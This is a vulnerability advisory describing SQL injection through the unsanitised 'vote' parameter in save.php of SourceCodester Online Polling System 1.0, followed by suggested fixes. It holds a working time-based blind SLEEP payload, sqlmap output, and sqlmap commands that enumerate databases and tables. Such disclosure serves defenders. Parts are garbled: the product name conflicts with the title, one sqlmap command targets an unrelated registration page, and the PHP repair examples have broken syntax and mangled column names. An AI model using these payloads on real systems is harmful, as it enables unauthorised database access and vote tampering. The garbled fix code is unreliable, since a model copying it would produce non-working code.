SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability

[ppp-src]

SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability

NAME OF AFFECTED PRODUCT(S)

• Online Examination System Project

Vendor Homepage

• https://www.sourcecodester.com/php/14351/online-examination-system-project.html

AFFECTED AND/OR FIXED VERSION(S)

submitter

• polaris0x1

Vulnerable File

• save.php

VERSION(S)

• V1.0

Software Link

• https://www.sourcecodester.com/sites/default/files/download/razormist/online-polling-system.zip

PROBLEM TYPE

Vulnerability Type

• SQL injection

Root Cause

• There is a typical SQL injection vulnerability in the save.php file of the project "Online Polling System". This vulnerability stems from the application's failure to properly clean and validate user input, directly using input data for database queries. In this code snippet, the variable $vote is the user input directly obtained through $REGUEST ['vote']. Due to the lack of any form of checking or escaping the content of $vote, malicious users can modify the structure of SQL queries by constructing special input values, thereby executing illegal SQL operations
• 

Vulnerability code snippets

    <?php
    require('connection.php');
    $vote = $_REQUEST['vote'];

    mysqli_query($conn, "UPDATE tbCandidates SET candidate_cvotes=candidate_cvotes+1 WHERE candidate_name='$vote'");

    mysqli_close($conn);
    ?> 

• In the above code snippet, the variable $vote is the user input directly obtained through $REGUEST ['vote ']. Due to the lack of any form of checking or escaping the content of $vote, malicious users can modify the structure of SQL queries by constructing special input values, thereby performing illegal SQL operations.

Impact

• Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

• During the security review of the "Online Polling System" project, polaris0x1 discovered a significant vulnerability in the save.php file. The vote parameter lacks proper sanitization and validation, allowing attackers to inject malicious SQL queries and gain unauthorized database access. This can result in the modification of voting data and potential exposure of sensitive information. Immediate measures are needed to address this flaw and ensure data security and fairness in the voting process.

No login or authorization is required to exploit this vulnerability

Vulnerability details and POC

Vulnerability type:

• Time based blind SQL injection

Vulnerability location:

• 'vote' parameter

Payload:

    vote=test 'AND (SELECT 5530 From (SELECT (SLEEP (5))) wnWB) -- AWBQ 

• This Payload indicates that if the injected SQL command is true, the database will execute the 'SLEEP (5)' function, causing the query to pause for 5 seconds. This delay is crucial for detecting database response, as it determines whether injected SQL statements are executed by observing response time.

Database Information:

• DBMS: MySQL>=5.0.12
• Web server operating system: Windows
• Web application technology: PHP 5.5.38, Apache 2.4.23

Parameter: vote (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: vote=test' AND (SELECT 5530 FROM (SELECT(SLEEP(5)))wnWB)-- AWBQ

• This is showing the payload implemented by running sqlmap
• 
• List all databases of the server using the constructed payload command using sqlmap

    python sqlmap.py -u "http://192.168.31.216:8115/save.php?vote=test" --batch --risk=3 --level=5 --dbs

• 
• List all table names under the specified database 'poll'

    python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch -D poll --tables

• 

Suggested repair

Regarding the SQL injection vulnerability discovered in the 'save. php' file in the 'Online Polling System' project, the following are several practical suggested fix measures:

1 Using parameterized queries (Prepared Statements)

• One of the most effective ways to prevent SQL injection attacks is to use parameterized queries. This method ensures that the structure of SQL commands is not altered by incoming data. In PHP, PDO (PHP Data Objects) or MySQL extensions can be used to implement parameterized queries.

Example code (using PDO):

    $stmt=$pdo ->prepare ('UPDATE tbCandidates SET candidate votes=candidate votes+1 WHERE candidate name=: vote ');
    $stmt ->execute (['vote '=>$vote]);

Example code (using MySQL):

    $stmt=$conn ->prepare ('UPDATE tbCandidates SET candidate votes=candidate votes+1 WHERE candidate name=? ');
    $stmt ->bind_param ('s(), $vote);
    $stmt ->execute();

2 Strengthen input validation

• Strict validation is crucial before processing any user input. Determine whether the input data conforms to the expected format and type, for example, if the 'vote' parameter should be a known candidate name, ensure that the input value strictly matches the candidate list.

Example code:

    $allowed_votes=['Candidate1 ',' Candidate2 ',' Candidate3 ']// Candidate list
    If (in array ($vote, $allowed_votes)){
    //Perform database update operations
    }Else{
    //Handling invalid inputs
    Echo "Invalid vote.";
    }

3 Implement appropriate error handling

• Avoid displaying SQL error messages in the user interface, which can be achieved through appropriate error handling. Ensure that error messages do not expose sensitive information and instead provide universal user-friendly errors.

Example code:

    Try{
    //Perform database operations
    }Catch (PDOException $e){
    //Record errors to log files
    Error log ($e ->getMessage ());
    //Display general error messages to users
    Echo "An error occurred. Please try again later.";
    }

4 Minimum permission principle

• Ensure that the database account used by the application only has the minimum permissions to perform necessary operations. For example, if the application does not require permission to delete records, then the account should not have this permission.